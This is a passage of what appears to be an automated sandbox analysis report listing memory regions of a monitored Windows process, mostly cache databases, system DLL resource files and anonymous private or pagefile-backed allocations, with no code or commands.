"\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db") Region: id = 414 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 415 start_va = 0x24c0000 end_va = 0x24c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024c0000" filename = "" Region: id = 416 start_va = 0x24d0000 end_va = 0x24fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 417 start_va = 0x2500000 end_va = 0x2501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 418 start_va = 0x2510000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 419 start_va = 0x2590000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 420 start_va = 0x2610000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 421 start_va = 0x2690000 end_va = 0x2691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 422 start_va = 0x26a0000 end_va = 0x26a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026a0000" filename = "" Region: id = 423 start_va = 0x26b0000 end_va = 0x26b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026b0000" filename = "" Region: id = 424 start_va = 0x26c0000 end_va = 0x26c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026c0000" filename = "" Region: id = 425 start_va = 0x26d0000 end_va = 0x26d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 426 start_va = 0x26e0000 end_va = 0x26e1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 427 start_va = 0x26f0000 end_va = 0x26f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 428 start_va = 0x2700000 end_va = 0x2701fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 429 start_va = 0x2710000 end_va = 0x27effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 430 start_va = 0x27f0000 end_va = 0x27f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 431 start_va = 0x2800000 end_va = 0x2803fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 432 start_va = 0x2810000 end_va = 0x2810fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 433 start_va = 0x2820000 end_va = 0x2820fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 434 start_va = 0x2830000 end_va = 0x2834fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 435 start_va = 0x2840000 end_va = 0x2843fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 436 start_va = 0x2850000 end_va = 0x2851fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 437 start_va = 0x2860000 end_va = 0x2863fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 438 start_va = 0x2870000 end_va = 0x2871fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 439 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 440 start_va = 0x2890000 end_va = 0x28a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000d.db") Region: id = 441 start_va = 0x28b0000 end_va = 0x28b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 442 start_va = 0x28c0000 end_va = 0x28c1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 443 start_va = 0x28d0000 end_va = 0x28d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 444 start_va = 0x28e0000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028e0000" filename = "" Region: id = 445 start_va = 0x28f0000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 446 start_va = 0x2970000 end_va = 0x2971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 447 start_va = 0x2980000 end_va = 0x2981fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 448 start_va = 0x2990000 end_va = 0x2a4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 449 start_va = 0x2a50000 end_va = 0x2a53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 450 start_va = 0x2a60000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 451 start_va = 0x2b60000 end_va = 0x2b66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 452 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 453 start_va = 0x2b80000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 454 start_va = 0x3bc0000 end_va = 0x3bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 455 start_va = 0x3bd0000 end_va = 0x3bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 456 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 457 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 458 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 459 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 460 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 461 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 462 start_va = 0x3cb0000 end_va = 0x3cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 463 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 464 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 465 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 466 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 467 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 468 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 469 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 470 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 471 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 472 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 473 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 474 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 475 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 476 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 477 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 478 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 479 start_va = 0x3ee0000 end_va = 0x3ee4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 480 start_va = 0x3ef0000 end_va = 0x3f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 481 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 482 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 483 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 484 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 485 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 486 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 487 start_va = 0x40e0000 end_va = 0x40e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 488 start_va = 0x40f0000 end_va = 0x40f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 489 start_va = 0x4100000 end_va = 0x4100fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 490 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 491 start_va = 0x4120000 end_va = 0x4127fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 492 start_va = 0x4130000 end_va = 0x4131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004130000" filename = "" Region: id = 493 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 494 start_va = 0x4150000 end_va = 0x4153fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 495 start_va = 0x4160000 end_va = 0x4160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 496 start_va = 0x4170000 end_va = 0x41b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 497 start_va = 0x41c0000 end_va = 0x41cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 498 start_va = 0x41d0000 end_va = 0x41d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 499 start_va = 0x41e0000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 500 start_va = 0x4260000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 501 start_va = 0x42e0000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 502 start_va = 0x4360000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 503 start_va = 0x43e0000 end_va = 0x445ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 504 start_va = 0x4460000 end_va = 0x4c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 505 start_va = 0x4c60000 end_va = 0x4cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 506 start_va = 0x4ce0000 end_va = 0x4ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 507 start_va = 0x4de0000 end_va = 0x7161fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 508 start_va = 0x7170000 end_va = 0x726ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 509 start_va = 0x7270000 end_va = 0x7761fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007270000" filename = "" Region: id = 510 start_va = 0x7770000 end_va = 0x7784fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007770000" filename = "" Region: id = 511 start_va = 0x7790000 end_va = 0x7790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 512 start_va = 0x77b0000 end_va = 0x77b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000077b0000" filename = "" Region: id = 513 start_va = 0x77c0000 end_va = 0x77c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000077c0000" filename = "" Region: id = 514 start_va = 0x77d0000 end_va = 0x7817fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077d0000" filename = "" Region: id = 515 start_va = 0x7820000 end_va = 0x7820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007820000" filename = "" Region: id = 516 start_va = 0x7830000 end_va = 0x7830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007830000" filename = "" Region: id = 517 start_va = 0x7840000 end_va = 0x7841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007840000" filename = "" Region: id = 518 start_va = 0x7850000 end_va = 0x7a08fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 519 start_va = 0x7b20000 end_va = 0x7b23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 520 start_va = 0x7b30000 end_va = 0x7b31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007b30000" filename = "" Region: id = 521 start_va = 0x7b90000 end_va = 0x7b91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007b90000" filename = "" Region: id = 522 start_va = 0x7ba0000 end_va = 0x7ba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007ba0000" filename = "" Region: id = 523 start_va = 0x7bb0000 end_va = 0x7bb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007bb0000" filename = "" Region: id = 524 start_va = 0x7be0000 end_va = 0x7be1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 525 start_va = 0x7bf0000 end_va = 0x7bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007bf0000" filename = "" Region: id = 526 start_va = 0x7c10000 end_va = 0x7c11fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 527 start_va = 0x7c30000 end_va = 0x7c31fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 528 start_va = 0x7c40000 end_va = 0x7c41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c40000" filename = "" Region: id = 529 start_va = 0x7c50000 end_va = 0x7c51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c50000" filename = "" Region: id = 530 start_va = 0x7c60000 end_va = 0x7c60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 531 start_va = 0x7c70000 end_va = 0x7c70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c70000" filename = "" Region: id = 532 start_va = 0x7c80000 end_va = 0x7c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c80000" filename = "" Region: id = 533 start_va = 0x7c90000 end_va = 0x7c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c90000" filename = "" Region: id = 534 start_va = 0x7ca0000 end_va = 0x7ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007ca0000" filename = "" Region: id = 535 start_va = 0x7cb0000 end_va = 0x7cb0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 536 start_va = 0x7cd0000 end_va = 0x7cd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007cd0000" filename = "" Region: id = 537 start_va = 0x7ce0000 end_va = 0x7ce8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ce0000" filename = "" Region: id = 538 start_va = 0x7d70000 end_va = 0x7deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d70000" filename = "" Region: id = 539 start_va = 0x7df0000 end_va = 0x7f0cfff monitored = 0 entry_point = 0x7df1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 540 start_va = 0x7f10000 end_va = 0x800ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 541 start_va = 0x8070000 end_va = 0x80effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008070000" filename = "" Region: id = 542 start_va = 0x8170000 end_va = 0x81effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008170000" filename = "" Region: id = 543 start_va = 0x8270000 end_va = 0x8273fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 544 start_va = 0x8280000 end_va = 0x8281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008280000" filename = "" Region: id = 545 start_va = 0x8290000 end_va = 